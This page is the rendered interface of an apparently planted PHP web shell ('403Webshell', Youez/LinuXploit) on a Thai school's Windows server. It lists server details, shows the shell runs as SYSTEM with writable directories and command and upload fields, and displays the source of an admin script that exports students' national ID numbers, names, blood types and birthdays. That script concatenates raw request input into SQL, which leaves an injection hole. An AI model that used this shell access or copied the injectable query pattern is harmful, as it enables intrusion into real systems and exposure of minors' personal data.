403Webshell
Server IP : 172.67.187.206  /  Your IP : 172.71.28.155
Web Server : Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
System : Windows NT WIN-ECQAAA40806 6.2 build 9200 (Windows Server 2012 Standard Edition) i586
User : SYSTEM ( 0)
PHP Version : 5.6.30
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  E:/Inetpub/www/myschool/triamudom/check/webadmin/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ Back ]     

Current File : E:/Inetpub/www/myschool/triamudom/check/webadmin/display_student_card_excel.php
<?php
//header("Content-Type: application/vnd.ms-excel");
//header('Content-Disposition: attachment; filename="report_display_student_card_excel.xls"');#ชื่อไฟล์
$strExcelFileName="Member-All.xls";
header("Content-Type: application/x-msexcel; name=\"$strExcelFileName\"");
header("Content-Disposition: inline; filename=\"$strExcelFileName\"");
header("Pragma:no-cache");


@session_start();
$path = "../";
include ($path.'include/config_db.php');
include ($path.'include/class_db.php'); 
include ($path.'include/class_display.php'); 
include ($path.'include/function.php'); 
 
 $CLASS['db']   = new db();
$CLASS['db']->connect(); 
$CLASS['disp']   = new display();
$db   = $CLASS['db']; 
$disp   = $CLASS['disp']; 

$link_value = $_REQUEST['link_value'];
$keyword = $_REQUEST['keyword'];
$link_value = "&keyword=".$keyword."&tb_student_degree=".$tb_student_degree;

$del_id = $_REQUEST['del_id'];
$process = $_REQUEST['process'];
$tb_student_id = $_REQUEST['tb_student_id'];
$tb_student_degree = $_REQUEST['tb_student_degree'];
$tb_student_degree = $_REQUEST['tb_student_degree'];

$select = $_REQUEST['select'];


 

//----------------------------ค่าพื้นฐานระบบเว็บไซต์-----------------------------//
$fetch_public = $db->fetch_array($db->query("select * from tb_public"));

//----------------------------ค่าพื้นฐานระบบเว็บไซต์-----------------------------//
function FnID($var){
	$srt[0] = substr($var, 0, 1);
	$srt[1] = substr($var, 1, 4);
	$srt[2] = substr($var, 5, 5);
	$srt[3] = substr($var, 10, 2);
	$srt[4] = substr($var, 12, 1);
	return $srt[0]."-".$srt[1]."-".$srt[2]."-".$srt[3]."-".$srt[4];
}
//--------------------ส่วนบนใช้สำหรับประกาศตัวแปรและ Config เท่านั้น----------------------------//
?>
<html xmlns:o="urn:schemas-microsoft-com:office:office"xmlns:x="urn:schemas-microsoft-com:office:excel"xmlns="http://www.w3.org/TR/REC-html40">
 <head>
<title><?php print $fetch_public['tb_public_title_admin'];?></title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
</HEAD>
<BODY>
<form id="frmMain" name="frmMain" method="post" action="#">
  <table width="99%" border="0" align="center" cellpadding="3" cellspacing="1">

    <tr bgcolor="#CCCCCC">
      <td width="8%" height="30" align="center" valign="middle" nowrap="nowrap"  ><strong>ลำดับที่</strong></td>
      <td width="13%" align="center" valign="middle" nowrap="nowrap"  ><strong>รหัสประจำตัว</strong></td>
      <td width="31%" align="center" valign="middle" nowrap="nowrap"  ><strong>เลขประจำตัวประชาชน</strong></td>
      <td width="19%" align="center" valign="middle" nowrap="nowrap"  ><strong>ชื่อ - สกุล </strong></td>
      <td width="13%" align="center" valign="middle" nowrap="nowrap"  ><strong>หมู่เลือด</strong></td>
      <td width="16%" align="center" valign="middle" nowrap="nowrap"  ><strong>วัน เดือน ปี เกิด </strong></td>
    </tr>
    <?php
										  $page_size = 50;
										  if ($PAGE =="" || $PAGE =="0" ) { 
											 $PAGE=1; 
										  }
										$goto = ($PAGE-1)*$page_size;	
										$limit = "limit  $goto , $page_size";
										if($keyword){
											$sql_search .=" and tb_student_name like '%".$keyword."%' ";
										}
										if($keyword){
											$sql_search .=" or tb_student_sname like '%".$keyword."%' ";
										}
										if($tb_student_degree){
											
											$sql_search .=" and tb_student_degree = '".$tb_student_degree."' ";
										}
										$sql =  "select * from tb_students where 1=1 $sql_search order  by tb_student_degree asc,tb_student_tname asc,tb_student_code asc,tb_student_degree asc ".$limit;				  
										$sql_all="select * from tb_students where 1=1  $sql_search order by tb_student_degree asc,tb_student_tname asc,tb_student_code asc,tb_student_degree asc";
										$query_dis = $db->query($sql);
										$queryall = $db->query($sql_all);
										$numrows = $db->num_rows($queryall);
										if($numrows >0){
											$i=1;
											while($fetch_dis = $db->fetch_array($query_dis)){
														if($i%2=="1"){
															$bg="rowone";
														}else{
															$bg="rowtwo";
														}
										?>
    <tr>
      <td height="25" align="center" valign="top" nowrap="nowrap"><?php print $i+$goto;?>.</td>
      <td align="center" valign="top" nowrap="nowrap"><?php print $fetch_dis['tb_student_code'];?></td>
      <td align="center" valign="top" nowrap="nowrap"><?php print FnID($fetch_dis['tb_student_idcard']);?></td>
      <td height="25" align="left" valign="top" nowrap="nowrap">&nbsp;<?php print display_nametype($fetch_dis['tb_student_tname']);?><?php print $fetch_dis['tb_student_name'];?> <?php print $fetch_dis['tb_student_sname'];?></td>
      <td align="center" valign="top"><?php print display_blood($fetch_dis['tb_student_blood']);?></td>
      <td align="center" valign="top">&nbsp;<?php print DateThai_show($fetch_dis['tb_student_birthday'])?>&nbsp;</td>
    </tr>
    <?php
											$i++;
											} }else{
										?>
    <tr>
      <td height="25" colspan="6" bgcolor="#FFFFFF"><div align="center" class="red_text"><strong>ไม่พบข้อมูล</strong></div></td>
    </tr>
    <?php 
												}
										  ?>
  </table>
</form>
</BODY>
</html>

Youez - 2016 - github.com/yon3zu
LinuXploit